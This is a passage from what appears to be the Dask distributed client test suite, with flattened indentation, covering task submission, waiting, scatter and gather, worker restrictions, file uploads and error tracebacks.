def g(a, b):
raise AttributeError
future_f = c.submit(f, 1, 2)
future_g = c.submit(g, 1, 2)
with pytest.raises(TypeError):
await c.gather(future_f)
with pytest.raises(AttributeError):
await c.gather(future_g)
await a.close()
@gen_cluster(client=True)
async def test_wait(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
z = c.submit(inc, 2)
done, not_done = await wait([x, y, z])
assert done == {x, y, z}
assert not_done == set()
assert x.status == y.status == "finished"
@gen_cluster(client=True)
async def test_wait_first_completed(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, 1)
z = c.submit(inc, 2)
done, not_done = await wait([x, y, z], return_when="FIRST_COMPLETED")
assert done == {z}
assert not_done == {x, y}
assert z.status == "finished"
assert x.status == "pending"
assert y.status == "pending"
@gen_cluster(client=True, timeout=2)
async def test_wait_timeout(c, s, a, b):
future = c.submit(sleep, 0.3)
with pytest.raises(TimeoutError):
await wait(future, timeout=0.01)
def test_wait_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
done, not_done = wait([x, y])
assert done == {x, y}
assert not_done == set()
assert x.status == y.status == "finished"
future = c.submit(sleep, 0.3)
with pytest.raises(TimeoutError):
wait(future, timeout=0.01)
def test_wait_informative_error_for_timeouts(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
try:
wait(x, y)
except Exception as e:
assert "timeout" in str(e)
assert "list" in str(e)
@gen_cluster(client=True)
async def test_garbage_collection(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
assert c.refcount[x.key] == 2
x.__del__()
await asyncio.sleep(0)
assert c.refcount[x.key] == 1
z = c.submit(inc, y)
y.__del__()
await asyncio.sleep(0)
result = await z
assert result == 3
ykey = y.key
y.__del__()
await asyncio.sleep(0)
assert ykey not in c.futures
@gen_cluster(client=True)
async def test_garbage_collection_with_scatter(c, s, a, b):
[future] = await c.scatter([1])
assert future.key in c.futures
assert future.status == "finished"
assert s.who_wants[future.key] == {c.id}
key = future.key
assert c.refcount[key] == 1
future.__del__()
await asyncio.sleep(0)
assert c.refcount[key] == 0
start = time()
while True:
if key not in s.tasks or not s.tasks[key].who_has:
break
else:
assert time() < start + 3
await asyncio.sleep(0.1)
@gen_cluster(timeout=1000, client=True)
async def test_recompute_released_key(c, s, a, b):
x = c.submit(inc, 100)
result1 = await x
xkey = x.key
del x
import gc
gc.collect()
await asyncio.sleep(0)
assert c.refcount[xkey] == 0
# 1 second batching needs a second action to trigger
while xkey in s.tasks and s.tasks[xkey].who_has or xkey in a.data or xkey in b.data:
await asyncio.sleep(0.1)
x = c.submit(inc, 100)
assert x.key in c.futures
result2 = await x
assert result1 == result2
@pytest.mark.slow
@gen_cluster(client=True)
async def test_long_tasks_dont_trigger_timeout(c, s, a, b):
from time import sleep
x = c.submit(sleep, 3)
await x
@pytest.mark.skip
@gen_cluster(client=True)
async def test_missing_data_heals(c, s, a, b):
a.validate = False
b.validate = False
x = c.submit(inc, 1)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([x, y, z])
# Secretly delete y's key
if y.key in a.data:
del a.data[y.key]
a.release_key(y.key)
if y.key in b.data:
del b.data[y.key]
b.release_key(y.key)
await asyncio.sleep(0)
w = c.submit(add, y, z)
result = await w
assert result == 3 + 4
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_missing_data(c, s, a, b):
a.validate = False
b.validate = False
x, y, z = c.map(inc, range(3))
await wait([x, y, z]) # everything computed
for f in [x, y]:
for w in [a, b]:
if f.key in w.data:
del w.data[f.key]
await asyncio.sleep(0)
w.release_key(f.key)
xx, yy, zz = await c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_nested_missing_data(c, s, a, b):
a.validate = False
b.validate = False
w = c.submit(inc, 1)
x = c.submit(inc, w)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([z])
for worker in [a, b]:
for datum in [y, z]:
if datum.key in worker.data:
del worker.data[datum.key]
await asyncio.sleep(0)
worker.release_key(datum.key)
result = await c.gather([z])
assert result == [inc(inc(inc(inc(1))))]
@gen_cluster(client=True)
async def test_tokenize_on_futures(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
tok = tokenize(x)
assert tokenize(x) == tokenize(x)
assert tokenize(x) == tokenize(y)
c.futures[x.key].finish()
assert tok == tokenize(y)
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_submit(c, s, a, b):
x = c.submit(inc, 1, workers={a.ip})
y = c.submit(inc, x, workers={b.ip})
await wait([x, y])
assert s.host_restrictions[x.key] == {a.ip}
assert x.key in a.data
assert s.host_restrictions[y.key] == {b.ip}
assert y.key in b.data
@gen_cluster(client=True)
async def test_restrictions_ip_port(c, s, a, b):
x = c.submit(inc, 1, workers={a.address})
y = c.submit(inc, x, workers={b.address})
await wait([x, y])
assert s.worker_restrictions[x.key] == {a.address}
assert x.key in a.data
assert s.worker_restrictions[y.key] == {b.address}
assert y.key in b.data
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_map(c, s, a, b):
L = c.map(inc, range(5), workers={a.ip})
await wait(L)
assert set(a.data) == {x.key for x in L}
assert not b.data
for x in L:
assert s.host_restrictions[x.key] == {a.ip}
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_get(c, s, a, b):
dsk = {"x": 1, "y": (inc, "x"), "z": (inc, "y")}
futures = c.get(dsk, ["y", "z"], workers=a.ip, sync=False)
result = await c.gather(futures)
assert result == [2, 3]
assert "y" in a.data
assert "z" in a.data
assert len(b.data) == 0
@gen_cluster(client=True)
async def test_restrictions_get_annotate(c, s, a, b):
x = 1
with dask.annotate(workers=a.address):
y = delayed(inc)(x)
with dask.annotate(workers=b.address):
z = delayed(inc)(y)
futures = c.get(z.__dask_graph__(), [y.key, z.key], sync=False)
result = await c.gather(futures)
assert result == [2, 3]
assert y.key in a.data
assert z.key in b.data
@gen_cluster(client=True)
async def dont_test_bad_restrictions_raise_exception(c, s, a, b):
z = c.submit(inc, 2, workers={"bad-address"})
try:
await z
assert False
except ValueError as e:
assert "bad-address" in str(e)
assert z.key in str(e)
@gen_cluster(client=True, timeout=None)
async def test_remove_worker(c, s, a, b):
L = c.map(inc, range(20))
await wait(L)
await b.close()
assert b.address not in s.workers
result = await c.gather(L)
assert result == list(map(inc, range(20)))
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_errors_dont_block(c, s, w):
L = [c.submit(inc, 1), c.submit(throws, 1), c.submit(inc, 2), c.submit(throws, 2)]
start = time()
while not (L[0].status == L[2].status == "finished"):
assert time() < start + 5
await asyncio.sleep(0.01)
result = await c.gather([L[0], L[2]])
assert result == [2, 3]
@gen_cluster(client=True)
async def test_submit_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
x = c.submit(assert_list, [1, 2, 3])
result = await x
assert result
x = c.submit(assert_list, [1, 2, 3], z=[4, 5, 6])
result = await x
assert result
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(assert_list, [x, y])
result = await z
assert result
@gen_cluster(client=True)
async def test_map_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
L = c.map(assert_list, [[1, 2, 3], [4]])
result = await c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], z=[10])
result = await c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], [[]] * 3)
result = await c.gather(L)
assert all(result)
@gen_cluster()
async def test_two_consecutive_clients_share_results(s, a, b):
c = await Client(s.address, asynchronous=True)
x = c.submit(random.randint, 0, 1000, pure=True)
xx = await x
f = await Client(s.address, asynchronous=True)
y = f.submit(random.randint, 0, 1000, pure=True)
yy = await y
assert xx == yy
await c.close()
await f.close()
@gen_cluster(client=True)
async def test_submit_then_get_with_Future(c, s, a, b):
x = c.submit(slowinc, 1)
dsk = {"y": (inc, x)}
result = await c.get(dsk, "y", sync=False)
assert result == 3
@gen_cluster(client=True)
async def test_aliases(c, s, a, b):
x = c.submit(inc, 1)
dsk = {"y": x}
result = await c.get(dsk, "y", sync=False)
assert result == 2
@gen_cluster(client=True)
async def test_aliases_2(c, s, a, b):
dsk_keys = [
({"x": (inc, 1), "y": "x", "z": "x", "w": (add, "y", "z")}, ["y", "w"]),
({"x": "y", "y": 1}, ["x"]),
({"x": 1, "y": "x", "z": "y", "w": (inc, "z")}, ["w"]),
]
for dsk, keys in dsk_keys:
result = await c.gather(c.get(dsk, keys, sync=False))
assert list(result) == list(dask.get(dsk, keys))
await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_scatter(c, s, a, b):
d = await c.scatter({"y": 20})
assert isinstance(d["y"], Future)
assert a.data.get("y") == 20 or b.data.get("y") == 20
y_who_has = s.get_who_has(keys=["y"])["y"]
assert a.address in y_who_has or b.address in y_who_has
assert s.get_nbytes(summary=False) == {"y": sizeof(20)}
yy = await c.gather([d["y"]])
assert yy == [20]
[x] = await c.scatter([10])
assert isinstance(x, Future)
assert a.data.get(x.key) == 10 or b.data.get(x.key) == 10
xx = await c.gather([x])
x_who_has = s.get_who_has(keys=[x.key])[x.key]
assert s.tasks[x.key].who_has
assert (
s.workers[a.address] in s.tasks[x.key].who_has
or s.workers[b.address] in s.tasks[x.key].who_has
)
assert s.get_nbytes(summary=False) == {"y": sizeof(20), x.key: sizeof(10)}
assert xx == [10]
z = c.submit(add, x, d["y"]) # submit works on Future
result = await z
assert result == 10 + 20
result = await c.gather([z, x])
assert result == [30, 10]
@gen_cluster(client=True)
async def test_scatter_types(c, s, a, b):
d = await c.scatter({"x": 1})
assert isinstance(d, dict)
assert list(d) == ["x"]
for seq in [[1], (1,), {1}, frozenset([1])]:
L = await c.scatter(seq)
assert isinstance(L, type(seq))
assert len(L) == 1
s.validate_state()
seq = await c.scatter(range(5))
assert isinstance(seq, list)
assert len(seq) == 5
s.validate_state()
@gen_cluster(client=True)
async def test_scatter_non_list(c, s, a, b):
x = await c.scatter(1)
assert isinstance(x, Future)
result = await x
assert result == 1
@gen_cluster(client=True)
async def test_scatter_hash(c, s, a, b):
[a] = await c.scatter([1])
[b] = await c.scatter([1])
assert a.key == b.key
s.validate_state()
@gen_cluster(client=True)
async def test_scatter_tokenize_local(c, s, a, b):
from dask.base import normalize_token
class MyObj:
pass
L = []
@normalize_token.register(MyObj)
def f(x):
L.append(x)
return "x"
obj = MyObj()
future = await c.scatter(obj)
assert L and L[0] is obj
@gen_cluster(client=True)
async def test_scatter_singletons(c, s, a, b):
np = pytest.importorskip("numpy")
pd = pytest.importorskip("pandas")
for x in [1, np.ones(5), pd.DataFrame({"x": [1, 2, 3]})]:
future = await c.scatter(x)
result = await future
assert str(result) == str(x)
@gen_cluster(client=True)
async def test_scatter_typename(c, s, a, b):
future = await c.scatter(123)
assert future.key.startswith("int")
@gen_cluster(client=True)
async def test_scatter_hash(c, s, a, b):
x = await c.scatter(123)
y = await c.scatter(123)
assert x.key == y.key
z = await c.scatter(123, hash=False)
assert z.key != y.key
@gen_cluster(client=True)
async def test_get_releases_data(c, s, a, b):
await c.gather(c.get({"x": (inc, 1)}, ["x"], sync=False))
import gc
gc.collect()
start = time()
while c.refcount["x"]:
await asyncio.sleep(0.01)
assert time() < start + 2
def test_current(s, a, b):
with Client(s["address"]) as c:
assert Client.current() is c
with pytest.raises(ValueError):
Client.current()
with Client(s["address"]) as c:
assert Client.current() is c
def test_global_clients(loop):
assert _get_global_client() is None
with pytest.raises(ValueError):
default_client()
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert _get_global_client() is c
assert default_client() is c
with Client(s["address"], loop=loop) as f:
assert _get_global_client() is f
assert default_client() is f
assert default_client(c) is c
assert default_client(f) is f
assert _get_global_client() is None
@gen_cluster(client=True)
async def test_exception_on_exception(c, s, a, b):
x = c.submit(lambda: 1 / 0)
y = c.submit(inc, x)
with pytest.raises(ZeroDivisionError):
await y
z = c.submit(inc, y)
with pytest.raises(ZeroDivisionError):
await z
@gen_cluster(client=True)
async def test_get_nbytes(c, s, a, b):
[x] = await c.scatter([1])
assert s.get_nbytes(summary=False) == {x.key: sizeof(1)}
y = c.submit(inc, x)
await y
assert s.get_nbytes(summary=False) == {x.key: sizeof(1), y.key: sizeof(2)}
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_nbytes_determines_worker(c, s, a, b):
x = c.submit(identity, 1, workers=[a.ip])
y = c.submit(identity, tuple(range(100)), workers=[b.ip])
await c.gather([x, y])
z = c.submit(lambda x, y: None, x, y)
await z
assert s.tasks[z.key].who_has == {s.workers[b.address]}
@gen_cluster(client=True)
async def test_if_intermediates_clear_on_error(c, s, a, b):
x = delayed(div, pure=True)(1, 0)
y = delayed(div, pure=True)(1, 2)
z = delayed(add, pure=True)(x, y)
f = c.compute(z)
with pytest.raises(ZeroDivisionError):
await f
s.validate_state()
assert not any(ts.who_has for ts in s.tasks.values())
@gen_cluster(
client=True, config={"distributed.scheduler.default-task-durations": {"f": "1ms"}}
)
async def test_pragmatic_move_small_data_to_large_data(c, s, a, b):
np = pytest.importorskip("numpy")
lists = c.map(np.ones, [10000] * 10, pure=False)
sums = c.map(np.sum, lists)
total = c.submit(sum, sums)
def f(x, y):
return None
results = c.map(f, lists, [total] * 10)
await wait([total])
await wait(results)
assert (
sum(
s.tasks[r.key].who_has.issubset(s.tasks[l.key].who_has)
for l, r in zip(lists, results)
)
>= 9
)
@gen_cluster(client=True)
async def test_get_with_non_list_key(c, s, a, b):
dsk = {("x", 0): (inc, 1), 5: (inc, 2)}
x = await c.get(dsk, ("x", 0), sync=False)
y = await c.get(dsk, 5, sync=False)
assert x == 2
assert y == 3
@gen_cluster(client=True)
async def test_get_with_error(c, s, a, b):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
await c.get(dsk, "y", sync=False)
def test_get_with_error_sync(c):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
c.get(dsk, "y")
@gen_cluster(client=True)
async def test_directed_scatter(c, s, a, b):
await c.scatter([1, 2, 3], workers=[a.address])
assert len(a.data) == 3
assert not b.data
await c.scatter([4, 5], workers=[b.name])
assert len(b.data) == 2
def test_directed_scatter_sync(c, s, a, b, loop):
futures = c.scatter([1, 2, 3], workers=[b["address"]])
has_what = sync(loop, c.scheduler.has_what)
assert len(has_what[b["address"]]) == len(futures)
assert len(has_what[a["address"]]) == 0
@gen_cluster(client=True)
async def test_scatter_direct(c, s, a, b):
future = await c.scatter(123, direct=True)
assert future.key in a.data or future.key in b.data
assert s.tasks[future.key].who_has
assert future.status == "finished"
result = await future
assert result == 123
assert not s.counters["op"].components[0]["scatter"]
result = await future
assert not s.counters["op"].components[0]["gather"]
result = await c.gather(future)
assert not s.counters["op"].components[0]["gather"]
@gen_cluster(client=True)
async def test_scatter_direct_numpy(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.ones(5)
future = await c.scatter(x, direct=True)
result = await future
assert np.allclose(x, result)
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True)
async def test_scatter_direct_broadcast(c, s, a, b):
future2 = await c.scatter(456, direct=True, broadcast=True)
assert future2.key in a.data
assert future2.key in b.data
assert s.tasks[future2.key].who_has == {s.workers[a.address], s.workers[b.address]}
result = await future2
assert result == 456
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_balanced(c, s, *workers):
futures = await c.scatter([1, 2, 3], direct=True)
assert sorted([len(w.data) for w in workers]) == [0, 1, 1, 1]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_broadcast_target(c, s, *workers):
futures = await c.scatter([123, 456], direct=True, workers=workers[0].address)
assert futures[0].key in workers[0].data
assert futures[1].key in workers[0].data
futures = await c.scatter(
[123, 456],
direct=True,
broadcast=True,
workers=[w.address for w in workers[:3]],
)
assert (
f.key in w.data and w.address in s.tasks[f.key].who_has
for f in futures
for w in workers[:3]
)
@gen_cluster(client=True, nthreads=[])
async def test_scatter_direct_empty(c, s):
with pytest.raises((ValueError, TimeoutError)):
await c.scatter(123, direct=True, timeout=0.1)
@gen_cluster(client=True, timeout=None, nthreads=[("127.0.0.1", 1)] * 5)
async def test_scatter_direct_spread_evenly(c, s, *workers):
futures = []
for i in range(10):
future = await c.scatter(i, direct=True)
futures.append(future)
assert all(w.data for w in workers)
@pytest.mark.parametrize("direct", [True, False])
@pytest.mark.parametrize("broadcast", [True, False])
def test_scatter_gather_sync(c, direct, broadcast):
futures = c.scatter([1, 2, 3], direct=direct, broadcast=broadcast)
results = c.gather(futures, direct=direct)
assert results == [1, 2, 3]
delayed(inc)(1).compute(direct=direct)
@gen_cluster(client=True)
async def test_gather_direct(c, s, a, b):
futures = await c.scatter([1, 2, 3])
data = await c.gather(futures, direct=True)
assert data == [1, 2, 3]
@gen_cluster(client=True)
async def test_many_submits_spread_evenly(c, s, a, b):
L = [c.submit(inc, i) for i in range(10)]
await wait(L)
assert a.data and b.data
@gen_cluster(client=True)
async def test_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
tb = await x.traceback()
assert any("x / y" in line for line in pluck(3, traceback.extract_tb(tb)))
@gen_cluster(client=True)
async def test_get_traceback(c, s, a, b):
try:
await c.get({"x": (div, 1, 0)}, "x", sync=False)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
@gen_cluster(client=True)
async def test_gather_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
try:
await c.gather(x)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
def test_traceback_sync(c):
x = c.submit(div, 1, 0)
tb = x.traceback()
assert any(
"x / y" in line
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
y = c.submit(inc, x)
tb2 = y.traceback()
assert set(pluck(3, traceback.extract_tb(tb2))).issuperset(
set(pluck(3, traceback.extract_tb(tb)))
)
z = c.submit(div, 1, 2)
tb = z.traceback()
assert tb is None
@gen_cluster(client=True)
async def test_upload_file(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
for value in [123, 456]:
with tmp_text("myfile.py", "def f():\n return {}".format(value)) as fn:
await c.upload_file(fn)
x = c.submit(g, pure=False)
result = await x
assert result == value
@gen_cluster(client=True)
async def test_upload_file_refresh_delayed(c, s, a, b):
with save_sys_modules():
for value in [123, 456]:
with tmp_text("myfile.py", "def f():\n return {}".format(value)) as fn:
await c.upload_file(fn)
sys.path.append(os.path.dirname(fn))
from myfile import f
b = delayed(f)()
bb = c.compute(b, sync=False)
result = await c.gather(bb)
assert result == value
@gen_cluster(client=True)
async def test_upload_file_no_extension(c, s, a, b):
with tmp_text("myfile", "") as fn:
await c.upload_file(fn)
@gen_cluster(client=True)
async def test_upload_file_zip(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
try:
for value in [123, 456]:
with tmp_text(
"myfile.py", "def f():\n return {}".format(value)
) as fn_my_file:
with zipfile.ZipFile("myfile.zip", "w") as z:
z.write(fn_my_file, arcname=os.path.basename(fn_my_file))
await c.upload_file("myfile.zip")
x = c.submit(g, pure=False)
result = await x
assert result == value
finally:
if os.path.exists("myfile.zip"):
os.remove("myfile.zip")
@gen_cluster(client=True)
async def test_upload_file_egg(c, s, a, b):
def g():
import package_1
import package_2
return package_1.a, package_2.b
# c.upload_file tells each worker to
# - put this file in their local_directory
# - modify their sys.path to include it
# we don't care about the local_directory
# but we do care about restoring the path
with save_sys_modules():
for value in [123, 456]:
with tmpfile() as dirname:
os.mkdir(dirname)
with open(os.path.join(dirname, "setup.py"), "w") as f:
f.write("from setuptools import setup, find_packages\n")
f.write(
'setup(name="my_package", packages=find_packages(), version="{}")\n'.format(
value
)
)
# test a package with an underscore in the name
package_1 = os.path.join(dirname, "package_1")
os.mkdir(package_1)
with open(os.path.join(package_1, "__init__.py"), "w") as f:
f.write("a = {}\n".format(value))
# test multiple top-level packages
package_2 = os.path.join(dirname, "package_2")
os.mkdir(package_2)
with open(os.path.join(package_2, "__init__.py"), "w") as f:
f.write("b = {}\n".format(value))
# compile these into an egg
subprocess.check_call(
[sys.executable, "setup.py", "bdist_egg"], cwd=dirname
)
egg_root = os.path.join(dirname, "dist")
# first file ending with '.egg'
egg_name = [
fname for fname in os.listdir(egg_root) if fname.endswith(".egg")
][0]
egg_path = os.path.join(egg_root, egg_name)
await c.upload_file(egg_path)
os.remove(egg_path)
x = c.submit(g, pure=False)
result = await x
assert result == (value, value)
@gen_cluster(client=True)
async def test_upload_large_file(c, s, a, b):
assert a.local_directory
assert b.local_directory
with tmp_text("myfile", "abc") as fn:
with tmp_text("myfile2", "def") as fn2:
await c._upload_large_file(fn, remote_filename="x")
await c._upload_large_file(fn2)
for w in [a, b]:
assert os.path.exists(os.path.join(w.local_directory, "x"))
assert os.path.exists(os.path.join(w.local_directory, "myfile2"))
with open(os.path.join(w.local_directory, "x")) as f:
assert f.read() == "abc"
with open(os.path.join(w.local_directory, "myfile2")) as f:
assert f.read() == "def"
def test_upload_file_sync(c):
def g():
import myfile
return myfile.x
with tmp_text("myfile.py", "x = 123") as fn:
c.upload_file(fn)
x = c.submit(g)
assert x.result() == 123
@gen_cluster(client=True)
async def test_upload_file_exception(c, s, a, b):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
await c.upload_file(fn)
def test_upload_file_exception_sync(c):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
c.upload_file(fn)
@gen_cluster(client=True, nthreads=[])
async def test_upload_file_new_worker(c, s):
def g():
import myfile
return myfile.x
with tmp_text("myfile.py", "x = 123") as fn:
await c.upload_file(fn)
async with Worker(s.address):
x = await c.submit(g)
assert x == 123
@pytest.mark.skip
@gen_cluster()
async def test_multiple_clients(s, a, b):
a = await Client(s.address, asynchronous=True)
b = await Client(s.address, asynchronous=True)
x = a.submit(inc, 1)
y = b.submit(inc, 2)
assert x.client is a
assert y.client is b
xx = await x
yy = await y
assert xx == 2
assert yy == 3
z = a.submit(add, x, y)
assert z.client is a
zz = await z
assert zz == 5
await a.close()
await b.close()
@gen_cluster(client=True)
async def test_async_compute(c, s, a, b):
from dask.delayed import delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
[yy, zz, aa] = c.compute([y, z, 3], sync=False)
assert isinstance(yy, Future)
assert isinstance(zz, Future)
assert aa == 3
result = await c.gather([yy, zz])
assert result == [2, 0]
assert isinstance(c.compute(y), Future)
assert isinstance(c.compute([y]), (tuple, list))
@gen_cluster(client=True)
async def test_async_compute_with_scatter(c, s, a, b):
d = await c.scatter({("x", 1): 1, ("y", 1): 2})
x, y = d[("x", 1)], d[("y", 1)]
from dask.delayed import delayed
z = delayed(add)(delayed(inc)(x), delayed(inc)(y))
zz = c.compute(z)
[result] = await c.gather([zz])
assert result == 2 + 3
def test_sync_compute(c):
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
yy, zz = c.compute([y, z], sync=True)
assert (yy, zz) == (2, 0)
@gen_cluster(client=True)
async def test_remote_scatter_gather(c, s, a, b):
x, y, z = await c.scatter([1, 2, 3])
assert x.key in a.data or x.key in b.data
assert y.key in a.data or y.key in b.data
assert z.key in a.data or z.key in b.data
xx, yy, zz = await c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@gen_cluster(timeout=1000, client=True)
async def test_remote_submit_on_Future(c, s, a, b):
x = c.submit(lambda x: x + 1, 1)
y = c.submit(lambda x: x + 1, x)
result = await y
assert result == 3
def test_start_is_idempotent(c):
c.start()
c.start()
c.start()
x = c.submit(inc, 1)
assert x.result() == 2
@gen_cluster(client=True)
async def test_client_with_scheduler(c, s, a, b):
assert s.nthreads == {a.address: a.nthreads, b.address: b.nthreads}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y)
result = await x
assert result == 1 + 1
result = await z
assert result == 1 + 1 + 1 + 2
A, B, C = await c.scatter([1, 2, 3])
AA, BB, xx = await c.gather([A, B, x])
assert (AA, BB, xx) == (1, 2, 2)
result = await c.get({"x": (inc, 1), "y": (add, "x", 10)}, "y", sync=False)
assert result == 12
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_allow_restrictions(c, s, a, b):
aws = s.workers[a.address]
bws = s.workers[a.address]
x = c.submit(inc, 1, workers=a.ip)
await x
assert s.tasks[x.key].who_has == {aws}
assert not s.loose_restrictions
x = c.submit(inc, 2, workers=a.ip, allow_other_workers=True)
await x
assert s.tasks[x.key].who_has == {aws}
assert x.key in s.loose_restrictions
L = c.map(inc, range(3, 13), workers=a.ip, allow_other_workers=True)
await wait(L)
assert all(s.tasks[f.key].who_has == {aws} for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
x = c.submit(inc, 15, workers="127.0.0.3", allow_other_workers=True)
await x
assert s.tasks[x.key].who_has
assert x.key in s.loose_restrictions
L = c.map(inc, range(15, 25), workers="127.0.0.3", allow_other_workers=True)
await wait(L)
assert all(s.tasks[f.key].who_has for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
with pytest.raises(ValueError):
c.submit(inc, 1, allow_other_workers=True)
with pytest.raises(ValueError):
c.map(inc, [1], allow_other_workers=True)
with pytest.raises(TypeError):
c.submit(inc, 20, workers="127.0.0.1", allow_other_workers="Hello!")
with pytest.raises(TypeError):
c.map(inc, [20], workers="127.0.0.1", allow_other_workers="Hello!")
@pytest.mark.skipif("True", reason="because")
def test_bad_address():
try:
Client("123.123.123.123:1234", timeout=0.1)
except (IOError, TimeoutError) as e:
assert "connect" in str(e).lower()
try:
Client("127.0.0.1:1234", timeout=0.1)
except (IOError, TimeoutError) as e:
assert "connect" in str(e).lower()
def test_informative_error_on_cluster_type():
with pytest.raises(TypeError) as exc_info:
Client(LocalCluster)
assert "Scheduler address must be a string or a Cluster instance" in str(
exc_info.value
)
@gen_cluster(client=True)
async def test_long_error(c, s, a, b):
def bad(x):
raise ValueError("a" * 100000)
x = c.submit(bad, 10)
try:
await x
except ValueError as e:
assert len(str(e)) < 100000
tb = await x.traceback()
assert all(
len(line) < 100000
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
@gen_cluster(client=True)
async def test_map_on_futures_with_kwargs(c, s, a, b):
def f(x, y=10):
return x + y
futures = c.map(inc, range(10))
futures2 = c.map(f, futures, y=20)
results = await c.gather(futures2)
assert results == [i + 1 + 20 for i in range(10)]
future = c.submit(inc, 100)
future2 = c.submit(f, future, y=200)
result = await future2
assert result == 100 + 1 + 200
class BadlySerializedObject:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise TypeError("hello!")
class FatallySerializedObject:
def __getstate__(self):
return 1
def __setstate__(self, state):
print("This should never have been deserialized, closing")
import sys
sys.exit(0)
@gen_cluster(client=True)
async def test_badly_serialized_input(c, s, a, b):
o = BadlySerializedObject()
future = c.submit(inc, o)
futures = c.map(inc, range(10))
L = await c.gather(futures)
assert list(L) == list(map(inc, range(10)))
assert future.status == "error"
with pytest.raises(Exception) as info:
await future
assert "hello!" in str(info.value)
@pytest.mark.skipif("True", reason="")
async def test_badly_serialized_input_stderr(capsys, c):
o = BadlySerializedObject()
future = c.submit(inc, o)
start = time()
while True:
sleep(0.01)
out, err = capsys.readouterr()
if "hello!" in err:
break
assert time() - start < 20
assert future.status == "error"
def test_repr(loop):
funcs = [str, repr, lambda x: x._repr_html_()]
with cluster(nworkers=3, worker_kwargs={"memory_limit": "2 GB"}) as (s, [a, b, c]):
with Client(s["address"], loop=loop) as c:
for func in funcs:
text = func(c)
assert c.scheduler.address in text
assert "threads=3" in text or "Cores: </b>3" in text
assert "6.00 GB" in text or "5.59 GiB" in text
if "<table" not in text:
assert len(text) < 80
for func in funcs:
text = func(c)
assert "not connected" in text
@gen_cluster(client=True)
async def test_repr_async(c, s, a, b):
c._repr_html_()
@gen_cluster(client=True, worker_kwargs={"memory_limit": None})
async def test_repr_no_memory_limit(c, s, a, b):
c._repr_html_()
@gen_test()
async def test_repr_localcluster():
cluster = await LocalCluster(
processes=False, dashboard_address=None, asynchronous=True
)
client = await Client(cluster, asynchronous=True)
try:
text = client._repr_html_()
assert cluster.scheduler.address in text
assert is_valid_xml(client._repr_html_())
finally:
await client.close()
await cluster.close()
@gen_cluster(client=True)
async def test_forget_simple(c, s, a, b):
x = c.submit(inc, 1, retries=2)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
await wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
assert set(s.tasks) == {x.key, y.key, z.key}
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.tasks
s.client_releases_keys(keys=[z.key], client=c.id)
